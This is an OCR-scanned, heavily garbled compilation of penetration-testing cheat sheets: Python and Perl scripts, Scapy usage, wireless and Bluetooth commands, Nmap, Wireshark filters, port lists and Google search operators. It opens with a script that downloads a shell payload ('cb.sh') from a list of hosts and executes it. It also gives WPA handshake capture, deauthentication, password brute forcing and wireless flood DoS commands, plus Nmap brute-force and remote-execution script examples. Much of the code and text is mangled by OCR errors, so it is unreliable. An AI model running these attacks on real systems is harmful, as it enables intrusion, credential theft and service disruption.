LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE 


#! /usr/bin/python 
import uürilrb2, os 


urls c 1115121217772. 222,529) 
port =. "SÜ" 
payload = "cb.sh" 


for url: 1. ors: 
u = "http://$s:$s/$s" $ (url, port, payload) 
bry: 
r = urllib2.urlopen(u) 
wfile = open("/tmp/cb.sh","vb") 
wfile.write(r.read()) 
wfile.close() 
break 
except: continue 


if os.path.exists ("/tmp/cb.sh"): 
os.system("chmod 700 /tmp/cb.sh") 
os.system("/tmp/cb.sh") 


PYTEON HTTP BANNER GRABBER (* TAKES AN IP RANGE, PORT, AND 
PACKET DELAY) 


#! /usr/bin/python 
import urllib2, sys, time 


from optparse import OptionParser 


parser = OptionParser() 

parser.add option("=t", dest="iprange",help="target IP range, i.e. 

197. 10168,42:1729'") 

parser.add option("-p", dest-" port'",deranlte" 90 helps" port, detåult=80") 
pårser.add opition( sd, dest="delay"ydefault=" SS", help="delåy fin seconds), 
default=.5 seconds") 


(opts, args) = parser.parse args() 


if opts.iprange is None: 
parser.error("you must supply an IP range") 


ips — Tj 
headers € 1) 


octets = opts.iprange.seliti(”.”) 


start = octets[3].split("'-') [0] 

stop: géLèES(S!] SEpiiÈ-( PE aki 

for i in range(int(start),int(stop)+1) : 
ips.append('$s.$s.$s.$d' 6 (octets[0],octets[1],octets[2],1)) 


print '\nScanning IPs: $s'n' $ (ips) 


IO 10 In. 198% 
tEY: 
response € urllib2.urlopen('http://$s:$s' $ (ip,opts.port)) 
headers[ip] = dict(response.info()) 
except Exception as e: 
headers[ip] = "Error: " + str(e) 


time.sleep(float(opts.delay)) 


for header in headers: 
TIVI 
print '$s : $s' $ (header,headers[header].get('server')) 
except: 
print '$s : $s' % (header, headers[header]) 


SCAPY 


“ When you craft TCP packets with Scapy, the underlying OS will not 
recognize the initial SYN packet and will reply with a RST packet. To 
mitigate this you need to set the following Iptables rule: 

iptables. =A OUTPUT -p tcp --tcp-flags RƏT RST —j DROP 


from scapy.all import Imports all scapy libraries 


ls() List all avaiable protocols 
lsc() List all scapy functions 
conf Shov/set scapy config 

IP (src=RandIP()) Generate random src IPs 
Ether(src-RandMAC()) Generate random src MACs 
ipslP(src" l.l.l.l'dst-"2.2.2.2'*) Specify IP parameters 
tcp=TCP (dport="443") Specify TCP parameters 
data="TCP data" Specify data portion 
packet=ip/tcp/data Create IP()/TCP() packet 
packet.show () Display packet configuration 
send (packet, count=1) Send 1 packet @ layer 3 
sendp (packet, count=2) Send 2 packets @ layer 2 
sendpfast (packet) Send faster using tcpreply 
sr(packet) Send 1 packet & get replies 
srl(packet) Send only return lst reply 
for i in range (0,1000): send (-packet-) Send -packet. 1000 times 
sniff(count=100, iface=eth0) Sniff 100 packets on ethO 


SEND IPv6 ICMP Msc 


sr(IPv6(src-" ipv6.", dst="<ipv6>")/ICMP()) 


UDP PACKET W/ SPECIFIC PAYLOAD: 


PS IPS" up, OSP) 
u=UDP (dport=1234, sport-5678) 
- pay = "my UDP packet" 
^ packet=ip/u/pay 
- packet.show() 
. wrpcap ("out.pcap",packet) : write to pcap 
send(packet) 


NTP FUZZER 


packet=IP(src=". ip lè, 
dst=".ip.")/UDP(dport=123) /fuzz (NTP (version=4, mode=4) ) 


SEND HTTP MESSAGE 


from scapy.all import * 

# Add iptables rule to block attack box from sending RSTs 

# Create web.txt with entire GET/POST packet data 

fileveb = open("veb.txt",”r”) 

data = fileveb.read() 

Lp. TR (dste'sip: 8) 

SYN=ip/TCP (rport=RandNum (6000, 7000) ,dport=80, flags="S", seg=4) 

SYNACK = sr1(SYN) 

ACK=ip/TCP (Sport=SYNACK.dport, dport=80, flags="A", seg=SYNACK.ack, ack=SYNACK. 
seq+1) /data i 
reply, error = sr(ACK) 

print reply.show() 
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PERL 


PERI PORT SCANNER 


use strict; use lO:;Socket; 

for(Sport=0;Sport 655355: Sport++)|4 
Sremote-IO::Socket::INET- new ( 
Proto=.-"tcp",PeerAddr=."127.0.0.1", PeerPort= Sport); 
if (Sremote) (print "Sport is open\n"}; } 
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REGEX EXPRESSIONS 


Start of string 
: 0 or more 

+ l or more 

2 U^ OE I 


Any char but \n 


acr Exactly 3 

EN 3 or more 

(3,5) S. Å ero 

15107 Tom. 5 

[345] d d 4075 

[^34] Not 3 or 4 

(a-z] lowercase a-z 

[A-Z] uppercase A-Z 

[0-9] digit (9 

YO Digit : 
ND Not digit 

NW A-2,a-z,0-9 

NW Not A-Z,a-z, 0-9 

NS White Space (\t\r\n\f) 
NS. Not. X5 VENNENE) 

“A 
reg[ex] "rege" or "regx" 
regex? "rege" or "regex" 
regex* "rege" w/ O or more x 
regext "rege" w/ 1 or more x 
[Rr]egex "Regex" or "regex" 
\d{3} Exactly 3 digits 
04-353 3 or more digits 
[aeiou] Any 1 vowel 
(O: ZI) Numbers O3-25 
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x00 
x08 
x09 
x0a 
xOd 
x1b 
x20 
x21 
%22 
x23 
x24 
x 
x26 
xc 
x28 
x29 
x2a 
«26 
KDE 
x2d 
x2e 
227 
x30 
x31 
x32 
233 
x34 
339 
x36 
x37 
x38 
x39 
x3a 
x3b 
xc 
x3d 
x3e 
xər 
x40 
x41 
x42 
x43 
x44 
x45 
x46 
x4" 
x48 
x49 
x4a 


IN Ot BP (9 MO H ON o € [ 


«o 0 


C, c4 Im (0 nj p] UO O UJ Jj an 


ASCII TABLE 
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NX 3 SECD”nN KOAVJOSI3 H- Fu H- Q nhƏOQQOQ O 0) 


Do ANK XS XX o ıı HU XU O ZX,Lr. 


a 


WIRELESS 


RFID 


Keyless Entry 


Cellular (US) 


GPS 
L Band 


802.15.4 (ZigBee) 


6020101 
802.11h/g 
S02 114 
802, ın 

C Band 

Ku Band 

K Band 

Ka Band 


(Bluetooth) 


FCC ID LOOKUP 


FREQUENCY CHART 


120-150. kHz 
13.56 MHZ 


(LF) 

(HF) 

433 MHz (UHF) 

315 MHz (N. Am) 

433.92 MHz (Europe,Asia) 
698-894 MHz 

1710-1755 MHZ 

1850-1910 MHz 

2110-2155. MHz 
1227.060,1575.42 MHz 


l2 Güz 

868 MHz (Europe) 
915 MHz (US,Australia) 
2.4 GHz (worldwide) 
Z2,4-2,483,5 (GH2 

2.4 GHz 

5.0 GHz 

2.4/5.0 GHZ 

4-8 GHz 

12-18 GHz 

18-26.5 GHz 
26.5-40 GHz 


ıhttps://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm 


FREQUENCY DATABASE 


http://www.radioreference.com/apps/db/ 


, 
3 


Eh FUOUmZDNƏ Q QC QU tfF3ƏSN?50(0 


GIRLTL 


KISMET REFERENCE [5] 


List Kismet servers 

Help 

Toggle full-screen view 

Name current network 

Toggle muting of sound 

View detailed information for network 
Tag or untag selected network 
Sort network list 

Group tagged networks 

Show wireless card power levels 
Ungroup current group 

Dump printable strings 

Show clients in current network 
Packet rate graph 

Lock channel hopping to selected channel 
View network statistics 

Return to normal channel hopping 
Dump packet type 

Expand/collapse groups 

Follow network center 

Re-draw the screen 

Track alerts 

Quit Kismet 

Close popup window 


85 


iwconfig 


LINUX WIFI COMMANDS 


rfkill list 
rfkill unblock all 
airdump-ng mono 


CONNECT TO UNSECURED WIFI 

iwconfig athO essid $SSID 

ifconfig athO up 

dhclient athO 

CONNECT TO WEP WIFI NETWORK 
ivconfig athü essid $SSID key  key- 
ifconfig atb0 up 

dhclient athO 

CONNECT TO WPA-PSK WIFI NETWORK 
iwconfig athO essid SSSID 

lrfcOmntsg acht) UP 

wpa supplicant -B -i athÜ -c wpa-psk.conf 
dhclient athO 

CoNNECT TO WPA-ENTERPRISE WIFI NETWORK 
ivconfig athÜ essid $SSID 

ifconfig athO up 

Wpa supplicant -B si athO -å Wwpa-ent.cont 
dhclient athO 


Wireless interface config 
Identify wifi problems 
Turn on wifi 

Monitor all interfaces 


LINUX BLUETOOTH 


hovcontig nero up 

holtool -—1.hcr0 scan --flusH —--all 
sdptool browse BD ADDR- 

hciconfig hciO name "NAME" class 0x520204 


piscan 
pand -K 
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Turn on bluetooth interface 
Scan for bluetooth devices 
List open services 

Set as discoverable 


Clear pand sessions 


LINUX WIFI TESTING 


START MONITOR MODE INTERFACE 
airmon-ng stop ath0 


airmon-ng start wifiO 
ivconfig athO channel SCH 


CAPTURE CLIENT HANDSHAKE 


airdump-ng -c SCH --bssid SAP -w file athO #Capture traffic 
aireplay-ng -0 10 -a SAP -c SCH athO #Force client de-auth 


BRUTE FORCE HANDSHAKE 


aircrack-ng -w wordlist capture.cap # WPA-PSK 
asleep -r capture.cap -W dict.asleep 4$ LEAP 
eapmd5pass -r capture.cap -w wordlist # EAP-MD5 


DOS ATTACKS 


mdk3 int a -a SAP #Auth Flood 
mdk3 int. b -c SCH #Beacon Flood 


SCRATCH PAD 


SCRATCH PAD 


SCRATCH PAD 


SCRATCH PAD 


SCRATCH PAD 


SCRATCH PAD 
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Scripting Engine 


-sC Run default scripts 
--script=<ScriptName> | 
<ScriptCategory>|<ScriptDir>... 
Run individual or groups of scripts 
--script-args=<Namel=Valuel,...> 
Use the list of script arguments 
--script-updatedb 
Update script database 


Script Categories 


Nmap's script categories include, but are not limited to, the 
following: 


auth: Utilize credentials or bypass authentication on target 
hosts. 

broadcast: Discover hosts not included on command line by 
broadcasting on local network. 

brute: Attempt to guess passwords on target systems, for a 
variety of protocols, including http, SNMP, IAX, MySQL, VNC, 
etc. 

default: Scripts run automatically when -sC or -A are used. 
discovery: Try to learn more information about target hosts 
through public sources of information, SNMP, directory services, 
and more. 

dos: May cause denial of service conditions in target hosts. 
exploit: Attempt to exploit target systems. 

external: Interact with third-party systems not included in 
target list. 

fuzzer: Send unexpected input in network protocol fields. 
intrusive: May crash target, consume excessive resources, or 
otherwise impact target machines in a malicious fashion. 
malware: Look for signs of malware infection on the target 
hosts. 

safe: Designed not to impact target in a negative fashion. 
version: Measure the version of software or protocol spoken 
by target hosts. 

vul: Measure whether target systems have a known 
vulnerability. 


Notable Scripts 


A full list of Nmap Scripting Engine scripts is 
available at http://nmap.org/nsedoc/ 


Some particularly useful scripts include: 


dns-zone-transfer: Attempts to pull a zone file 
(AXFR) from a DNS server. 

$ nmap --script dns-zone- 
transfer.nse --script-args dns-zone- 
transfer.domain-«domain» -p53 
«hosts» 


http-robots.txt: Harvests robots.txt files from 
discovered web servers. 

$ nmap --script http-robots.txt 
«hosts» 


smb-brute: Attempts to determine valid 
username and password combinations via 
automated guessing. 

$ nmap --script smb-brute.nse -p445 
«hosts» 


smb-psexec: Attempts to run a series of 
programs on the target machine, using 
credentials provided as scriptargs. 

$ nmap --script smb-psexec.nse - 
script-args-smbuser-«username», 
smbpass=<password>[,config=<conf1ig>] 
-p445 <hosts> 


Cheat Sheet 
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POCKET REFERENCE GUIDE 
SANS Institute 


http://www.sans.org 


INSTITUTE 


Base Syntax 
# nmap [ScanType] [Options] (targets) 


Target Specification 


IPV4 address: 192.168.1.1 

IPv6 address: AABB: CCDD: : FF%ethO 

Host name: www. target.tgt 

IP address range: 192.168.0-255.0-255 
CIDR block: 192.168.0.0/16 

Use file with lists of targets: -iL «filename» 


Target Ports 


No port range specified scans 1,000 most popular 
ports 


-F Scan 100 most popular ports 

-p<portl>-<port2> Port range 

-p«portl», «port2»,... Port List 

-pU:53,U:110,T20-445 Mix TCP and UDP 

-r Scan linearly (do not randomize ports) 

--top-ports «n» Scan n most popular ports 

-p-65535 Leaving off initial port in range makes 
Nmap scan start at port 1 

-p0- Leaving off end port in range makes 
Nmap scan through port 65535 

-p- Scan ports 1-65535 


Probing Options 
-Pn Dont probe (assume all hosts are up) 
-PB Default probe (TCP 80, 445 & ICMP) 


-PS«portlist» 
Check whether targets are up by probing TCP 
ports 


Use ICMP Echo Request 
Use ICMP Timestamp Request 


Use ICMP Netmask Request 


Scan Types 


Fine-Grained Timing Options 


--min-hostgroup/max-hostgroup «size» 
Parallel host scan group sizes 


--min-parallelism/max-parallelism 
<numprobes> 


Probe parallelization 


--min-rtt-timeout/max-rtt- 
timeout/initial-rtt-timeout <time> 
Specifies probe round trip time. 


--max-retries <tries> 
Caps number of port scan probe 
retransmissions. 


Aggregate Timing Options 


Paranoid: Very slow, used for IDS evasion 
Sneaky: Quite slow, used for IDS evasion 
Polite: Slows down to consume less 
bandwidth, runs »10 times slower than 
default 

Normal: Default, a dynamic timing model 
based on target responsiveness 
Aggressive: Assumes a fast and reliable 
network and may overwhelm targets 
Insane: Very aggressive; will likely 
overwhelm targets or miss open ports 


Output Formats 


--host-timeout <time> -oN Standard Nmap output 
Give up on target after this long -oG Greppable format 


-0X XML format 
—oA <basename> 


Probe only (host discovery, not port scan) 


SYN Scan --scan-delay/--max-scan-delay <time> 


TCP Connect Scan 
UDP Scan 

Version Scan 

OS Detection 


--scanflags Set custom list of TCP using 
URGACKPSHRSTSYNFIN in any order 


Adjust delay between probes 


--min-rate «number» 
Send packets no slower than 
«number» per second 


--max-rate «number» 
Send packets no faster than 
«number» per second 


Generate Nmap, Greppable, and XML 
output files using basename for files 


Misc Options 


Disable reverse IP address lookups 
Use IPv6 only 

Use several features, including OS 
Detection, Version Detection, Script 
Scanning (default), and traceroute 


--reason Display reason Nmap thinks port is 


open, closed, or filtered 


Service and version detection 

-sV: version detection --all-ports dont exclude ports 
--version-all try every single probe 

--version-trace trace version scan activity 


Target specification 
IP address, hostnames, networks, etc 


Example: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL file input from list -iR n choose random targets, 0 never ending 
--exclude --excludefile file exclude host or list from file 


-O enable OS detection --fuzzy guess OS detection 
H å --max-os-tries set the maximum number of tries against a target 
ost discovery 
-PS n tcp syn ping -PA n tcp ack ping -PU n udp ping : A 
-PM 5 req -PP timestamp req -PE echo req Firewall/IDS evasion 
èk l etiséan -PO protocol ping -PN no ping -f fragment packets -D d1,d2 cloak scan with decoys 
ino DNS -R DNS resolution for all targets -S ip spoof source address —g source spoof source port 
--traceroute: trace path to host (for topology map) --randomize-hosts order --spoof-mac mac change the src mac 


-sP pi —PP —PM -PS443 -PA . : : 
SI ping same as 5443 80 Verbosity and debugging options 


. . -v Increase verbosity level --reason host and port reason 
Port scanning techniques -d (1-9) set debugging level --packet-trace trace packets 
-SS tcp syn scan -ST tcp connect scan -SU udp scan 
-SY sctp init scan -SZ sctp cookie echo -SO ip protocol he 
-sW tcp window -SN —sF -sX null, fin, xmas —sA tcp ack Ane race option 


V/V increase/decrease verbosity level 
d/D increase/decrease debugging level 
p/P turn on/off packet tracing 


Port specification and scan order 


-p n-m range -p- all ports -p n,m,z individual 
-p U:n-m,z T:n,m U for udp T for tcp -F fast, common 100 Miscellaneous options 
--top-ports n scan the highest-ratio ports -r don't randomize --resume file resume aborted scan (from oN or 0G output) 


-6 enable ipv6 scanning 
-A agressive same as -O -sV -sC --traceroute 


SecurityByDefault.com 


Timing and performance 


-TO paranoid -T1 sneaky -T2 polite : 

-T3 normal - [4 aggresive -T5 insane Scripts : 
—min-hostgroup —max-hostgroup -SC perform scan with default scripts --script file run script (or all) 
rape EN --seript-args n-v provide arguments | m 

—min-parallelism —max-parallelism --script-trace print incoming and outgoing communication 

—min-rit-timeout —max-rtt-timeout --initial-rtt-timeout Output 

--max-retries --host-timeout --scan-delay -oN normal -oX xml -0G grepable -oA all outputs 


Examples 


Quick scan nmap - 14 -F Nmap 5) 


Fast scan (port80) nmap - 14 --max rtt timeout 200 --initial rtt timeout 150 --min hostgroup 512 --max retries 0 -n -PO -p80 


Pingscan nmap -sP -PE -PP -PS21,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4 


Slow comprehensive nmap -sS -sU -T4 -A -v -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 -PO —script all eh eat sheet 


Quick traceroute: nmap -sP -PE -PS22,25,80 -PA21,23,80,3389 -PU -PO --traceroute 


WIRESHARK DISPLAY FILTERS " PART 1 


Ethernet 
eth.addr eth. len eth.src 
eth.dst eth.lg eth.trailer 
eth.ig eth.multicast eth.type 
IEEE 802.1Q 
vlan.cfi vlan. id vlan.priority 
vlan.etype vlan. len vlan. trailer 
IPv4 
ip. addr ip.fragment.overlap.conflict 
ip.checksum ip.fragment.toolongfragment 
ip.checksum bad ip.fragments 
ip.checksum good ip.hdr len 
ip.dsfield ip.host 
ip.dsfield.ce ip.id 
ip.dsfield.dscp ip.len 
ip.dsfield.ect ip.proto 
ip.dst ip.reassembled_in 
ip.dst_host ip.src 
ip.flags ip.src_host 
ip. flags.df ip.tos 
ip. flags.mf ip.tos.cost 
ip.flags.rb ip.tos.delay 
ip.frag_offset ip.tos.precedence 
ip. fragment ip.tos.reliability 
ip.fragment.error ip.tos.throughput 
ip.fragment.multipletails ip.ttl 
ip. fragment.overlap ip.version 
IPv6 
ipv6.addr ipv6.hop_opt 
ipv6.class ipv6.host 
ipv6.dst ipv6.mipv6 home address 
ipv6.dst host ipv6.mipv6 length 
ipv6.dst opt ipv6.mipv6 type 
ipv6. flow ipv6.nxt 
ipv6.fragment ipv6.opt.padl 
ipv6.fragment.error ipv6.opt.padn 
ipv6. fragment.more ipv6. plen 
ipv6. fragment.multipletails ipv6.reassembled in 
ipv6.fragment.offset ipv6.routing hdr 
ipv6.fragment.overlap ipv6.routing hdr.addr 
ipv6.fragment.overlap.conflict ipv6.routing hdr.left 
ipv6.fragment.toolongfragment ipv6.routing hdr.type 
ipv6.fragments ipv6.src 
ipv6. fragment. id ipv6.src host 


ipv6.hlim 


ipv6. 


version 


arp. 


arp 


arp. 
arp. 
arp. 


tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 
tcp. 


tcp 


tcp. 
tcp. 
tcp. 


tcp 


tcp. 
tcp. 
tcp. 


tcp 


tcp. 
tcp. 
tcp. 
tcp. 


udp. 
udp. 
udp. 


packetlife.net 
ARP 
dst.hw mac arp.proto.size 
.dst.proto ipv4 arp.proto.type 
hw. size arp.src.hw mac 
hw. type arp.src.proto ipv4 
opcode 
TCP 
ack tcp.options.qs 
checksum tcp.options.sack 
checksum bad tcp.options.sack le 
checksum good tcp.options.sack perm 
continuation to tcp.options.sack re 
dstport tcp.options.time stamp 
flags tcp.options.wscale 
flags.ack tcp.options.wscale val 
flags . cwr tcp.pdu. last frame 
flags.ecn tcp.pdu.size 
flags.fin tcp.pdu.time 
flags.push tcp.port 
flags.reset tcp.reassembled in 
flags.syn tcp.segment 
.flags.urg tcp.segment.error 
hdr len tcp.segment.multipletails 
len tcp.segment.overlap 
nxtseq tcp.segment.overlap.conflict 
. options tcp.segment.toolongfragment 
options.cc tcp.segments 
options.ccecho tcp.seq 
options.ccnew tcp.srcport 
.options.echo tcp.time delta 
options.echo reply tcp.time relative 
options.md5 tcp.urgent pointer 
options.mss tcp.window size 
options.mss val 
UDP 
checksum udp.dstport udp.srcport 
checksum bad — udp. length 
checksum good udp.port 
Operators Logic 
eq or == and or 66 . Logical AND 
ne or !z or or || Logical OR 
gt or » xor or ^^ Logical XOR 
lt or < not or ! Logical NOT 
ge or >= [n] [..] Substring operator 
le or <= 


WIRESHARK DISPLAY 


ER: 
fr. 
fr. 
fr. 
fr. 
fr. 
Fr: 
fr. 
fr 
fr 
fr 
fr. 
fr. 


Frame Relay 


ppp.address 


ppp.control 


mp L 
mp L 
mp L 
mp L 
mp L 
mp L 


icm 
icm 
icm 


dtp.neighbor 


dtp.tlv len dtp. version 
VTP 

vtp. code vtp.vlan info. 
vtp.conf rev num vtp.vlan info. 
vtp.followers vtp.vlan info. 
vtp.md vtp.vlan info. 
vtp.md5 digest vtp.vlan info. 
vtp.md len vtp.vlan info. 
vtp.seq num vtp.vlan info. 
vtp.start value vtp.vlan info. 
vtp.upd id vtp.vlan info. 
vtp.upd ts vtp.vlan info. 
vtp.version 


becn fr.de 
chdlctype fr.dlci 
control fr.dlcore control 
control.f fr.ea 
control.ftype fr.fecn 
control.n r fr.lower dlci 
control.n s fr.nlpid 
control.p fr.second_dlci 
.control.s ftype fr.snap.oui 
.control.u modifier cmd fr.snap.pid 
«Control.u modifier resp  fr.snaptype 
cr fr.third dlci 
dc fr.upper dlci 
PPP 


ppp.direction 


ppp.protocol 


«Oam 


oam 
oam 
oam 
oam 
ttl 


MPLS 
s.bottom mp ls 
S.cw.controLl mpls. 
S.cw. res mpls. 
s.exp mpls. 
s.label mpls. 
s.oam.bip16 mpls. 

ICMP 
p.checksum icmp.ident 
p.checksum bad icmp.mtu 
p.code icmp.redir gw 


DTP 


dtp.tlv type 


.defect location 
.defect type 

. frequency 
.function type 
.ttsi 


icmp.seq 
icmp.type 


vtp.neighbor 


802 10 index 

isl vlan id 

len 

mtu size 
status.vlan susp 
tlv Len 

tlv type 

vlan name 

vlan name len 
vlan type 


FILTERS : PART 2 
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ICMPv6 

icmpv6.all comp icmpv6.option.name type.fqdn 
icmpv6.checksum icmpv6.option.name x501 
icmpv6.checksum bad icmpv6.option.rsa.key hash 
icmpv6.code icmpv6.option.type 
icmpv6.comp icmpv6.ra.cur hop limit 
icmpv6.haad.ha addrs icmpv6.ra.reachable time 
icmpv6.identifier icmpv6.ra.retrans timer 
icmpv6.option icmpv6.ra.router lifetime 
icmpv6.option.cga icmpv6.recursive dns serv 
icmpv6.option.length icmpv6.type 
icmpv6.option.name_type 

RIP 
rip.auth.passwd rip.ip rip.route_tag 
rip.auth.type rip.metric rip.routing domain 
rip. command rip.netmask rip.version 
rip. family rip.next_hop 

BGP 
bgp.aggregator_as bgp.mp reach nlri ipv4 prefix 
bgp.aggregator origin  bgp.mp unreach nlri ipv4 prefix 
bgp.as path bgp.multi exit disc 
bgp.cluster identifier bgp.next hop 
bgp.cluster list bgp.nlri prefix 
bgp.community as bgp.origin 
bgp.community value bgp.originator id 
bgp.local pref bgp. type 
bgp.mp nlri tnl id bgp.withdrawn prefix 

HTTP 
http.accept http.proxy authorization 
http.accept encoding http.proxy connect host 
http.accept language http.proxy connect port 
http.authbasic http.referer 
http.authorization http.request 
http.cache control http.request.method 
http.connection http.request.uri 
http.content encoding http.request.version 
http.content length http.response 
http.content type http.response. code 
http.cookie http.server 
http.date http.set cookie 
http.host http.transfer encoding 
http.last modified http.user agent 
http. location http.www authenticate 
http.notification http.x forwarded for 


http. 


proxy authenticate 


COMMON PORTS 


67-68 


88 

102 

110 

113 

119 

123 

135 
137-139 
143 
161-162 
177 

179 

201 

264 

318 
381-383 
389 
411-412 
443 

445 

464 

465 

497 

500 

512 

513 

514 

515 

520 

521 

540 


Echo 
Chargen 
FTP 


Telnet 

SMTP 

WINS Replication 
WHOIS 
TACACS 

DNS 
DHCP/BOOTP 
TFTP 

Gopher 
Finger 

HTTP 
Kerberos 

MS Exchange 
POP3 

Ident 

NNTP (Usenet) 
NTP 
Microsoft RPC 
NetBIOS 
IMAP4 

SNMP 

XDMCP 

BGP 
AppleTalk 
BGMP 

TSP 

HP Openview 
LDAP 


Microsoft DS 


Kerberos 


Retrospect 


rexec 
rlogin 
syslog 
LPD/LPR 

RIP 

RIPng (IPv6) 
UUCP 


554 
546-547 
560 
563 
587 
591 
593 
631 
636 
639 
646 
691 
860 
873 
902 
989-990 
993 
995 
1025 
1026-1029 
1080 
1080 
1194 
1214 
1241 
1311 
1337 
1433-1434 
1512 
1589 
1701 
1723 
1725 
1741 
1755 
1812-1813 
1863 
1985 
2000 
2002 
2049 


2082-2083 


2100 
2222 
2302 


2483-2484 


TCP/UDP Port Numbers 


RTSP 
DHCPv6 


rmonitor 


SMTP 
FileMaker 
Microsoft DCOM 


Internet Printing 


MSDP (PIM) 
LDP (MPLS) 
MS Exchange 
ISCSI 

rsync 


VMware Server 


Microsoft RPC 
Windows Messenger 
SOCKS Proxy 


OpenVPN 


Nessus 


Dell OpenManage 


Microsoft SQL 
WINS 

Cisco VQP 
L2TP 

MS PPTP 


CiscoWorks 2000 


RADIUS 


Cisco HSRP 
Cisco SCCP 
Cisco ACS 
NFS 

cPanel 
Oracle XDB 
DirectAdmin 


> 
2 
m 
o 
te 
x 


Oracle DB 


3784-3785 


5004-5005 


5222-5223 


6346-6347 


6665-6669 
6679/6697 


6881-6999 


2745 
2967 Symantec AV 
3050 Interbase DB 
3074 
3124 HTTP Proxy 
3127 
3128 HTTP Proxy 
3222 GLBP 

3260 iSCSI Target 
3306 MySQL 

3389 Terminal Server 
3689 iTunes 

3690 Subversion 
3724 


4333 mSQL 
4444 
4664 Google Desktop 
4672 
4899 Radmin 
5000 UPnP 

5001 
5001 iperf 


5050 
5060 
5190 


5432 PostgreSQL 
5500 VNC Server 
5554 


5631-5632 pcAnywhere 


5800 VNC over HTTP 


5900-4 VNC Server 
6000-6001 X11 


6112 
6129 DameWare 
6257 


6500 
6566 SANE 
6588 


6699 


6891-6901 


7648-7649 


12035-12036 
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6970 
7212 GhostSurf 


8000 
8080 HTTP Proxy 


8086-8087 Kaspersky AV 


8118 Privoxy 

8200 VMware Server 
8500 Adobe ColdFusion 
8767 
8866 
9100 HP JetDirect 


9101-9103 Bacula 


9119 
9800 WebDAV 
9898 
9988 
9999 Urchin 
10000 Webmin 
10000 BackupExec 


10113-10116 NetlO 


11371 OpenPGP 


12345 


13720-13721 NetBackup 


14567 
15118 
19226 AdminSecure 
19638 Ensim 
20000 Usermin 
24800 
25999 
27015 
27374 
28960 
31337 


33434+ traceroute 


Legend 


E] Chat 


EI Encrypted 
Å Gaming 
u Malicious 


an Peer to Peer 


a Streaming 


IANA port assignments published at http://www.iana.org/assignments/port-numbers 


by Jeremy Stretch 


v1. 
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Advanced Operators 


site: 
[#]...[#] or numrange: 


date: 


safesearch: 
link: 

info: 
related: 


intitle: 


allintitle: 


inurl: 


allinurl: 


filetype: or ext: 


phonebook: or 
rphonebook: or 
bphonebook 


author: 


insubject: 


define: 


Search only one website 


Search within a range of numbers 


Search only a range of months 


Exclude adult-content 
linked pages 

Info about a page 
Related pages 


Searches for strings in the 
title of the page 


Searches for all strings within 
the page title 


Searches for strings in the URL 


Searches for all strings 
within the URL 


Searches for files with that 
file extension 


Display the Google cache 
of the page 


Display all, residential, 
business phone listings 
Searches for the author of a 


newsgroup post 


Search only in the subject of a 
newsgroup post 


Various definitions of the word 
or phrase 


Get information on a stock 
abbreviation 


Advanced Operators 


What To Type Into Search Box (& Description of Results) 


conference site:www.sans.org (Search SANS site for conference info) 


plasma television $1000...1500 (Search for plasma televisions between $1000 and $1500) 


hockey date: 3 (Search for hockey references within past 3 months; 6 and 12-month date- 
restrict options also available) 


safesearch: sex education (Search for sex education material without returning adult sites) 
link:www.sans.org (Find pages that link to the SANS website) 

info:www.sans.org (Find information about the SANS website) 

related:www.stanford.edu (Find websites related to the Stanford website) 
intitle:conference (Find pages with "conference" in the page title) 

allintitle:conference SANS (Find pages with "conference" and "SANS" in the page title. 
Doesn't combine well with other operators) 

inurl:conference (Find pages with the string "conference" in the URL) 


allinurl:conference SANS (Find pages with “conference” and "SANS" in the URL. 
Doesn't combine well with other operators) 


filetype:ppt (Find files with the "ppt" file extension. 
".ppt" are MS PowerPoint files.) 


cache:www.sans.org (Show the cached version of the page without performing the search) 


phonebook:Rick Smith MD (Find all phone book listing for Rick Smith in Maryland. 
Cannot combine with other searches) 


author:Rick (Find all newsgroup postings with "Rick" in the author name or email adaress. 
Must be used with a Google Group search) 


insubject:Mac OS X (Find all newsgroup postings with "Mac OS X" in the subject of the 
post. Must be used with a Google Group search) 


define:sarcastic (Get the definition of the word sarcastic) 


stock: AAPL (Get the stock information for Apple Computer, Inc.) 


Number Searching 


129999W99999999999 UPS tracking numbers 


999999999999 FedEx tracking numbers 


9999 9999 9999 9999 9999 99| USPS tracking numbers 


AAAAA999A9AA99999 Vehicle Identification Numbers (VIN) 


305214274002 UPC codes 


202 Telephone area codes 
patent 5123123 Patent numbers 

(Remember to put the word "patent" 
before your patent number) 

n199ua FAA airplane registration numbers 
(An airplane's FAA registration number 
is typically printed on its tail) 

fcc BAZ-34009-PIR FCC equipment IDs 

(Remember to put the word "fcc" 
before the equipment ID) 


Calculator Operators 


45 + 39 


addition 

subtraction 45 - 39 
multiplication 45 * 39 
division 45 / 39 
percentage of 45% of 39 


raise to a power 245 
(2 to the 5th power) 


Operator Examples 


Operator Example 


sailboat chesapeake bay 


sloop OR yawl 
“To each his own" 


virus -computer 


Star Wars Episode +1l! 


«boat loan 


define:sarcastic 


I'm Feeling Lucky 
(Google link) 


Finds Pages Containing 


the woras sailboat, Chesapeake and 
Bay 


either the word sloop or the word yawl 
the exact phrase to each his own 


the word virus but NOT the word 
computer 


This movie title, including the roman 
numeral Ill 


loan info for both the word boat and its 
synonyms: canoe, ferry, etc. 


definitions of the word sarcastic from 
the Web 


the woras Mac and X separated by 
exactly one word 


Takes you directly to first web page 
returned for your query 


Search 
Parameters 
q 


filter 


as filetype 


as occt 


as sitesearch 


Search Parameters 


Value 


the search term 


Oor 1 


a search phrase 


| = include 
e — exclude 


a file extension 


any = anywhere 

title = page title 

body = text of page 

url = in the page URL 

links = in links to 
the page 


| = include 


e — exclude 


site or domain 


m3 - three months 
m6 = six months 
y — past year 


Description of Use in 
Google Search URLs 


The search term 


If filter is set to 0, show 
potentially duplicate results. 


The value submitted is as an 
exact phrase. No need to 
surround with quotes. 


The file type indicated by 
as filetype is included or 
excluded in the search. 


The file type is included or 
excluded in the search 
indicated by as ft. 


Find the search term 
in the specified location. 


The site or domain indicated 
by as sitesearch is included 
or excluded in the search. 


The file type is included or 
excluded in the search 
indicated by as dt. 


Locate pages updated with in 
the specified time frame. 


Google 
Hacking and Defense 
Cheat Sheet 


POCKET REFERENCE GUIDE 
SANS May Sharp Program 


http://www.sans.org 
http://www.sans.org/staysharp 


Purpose 


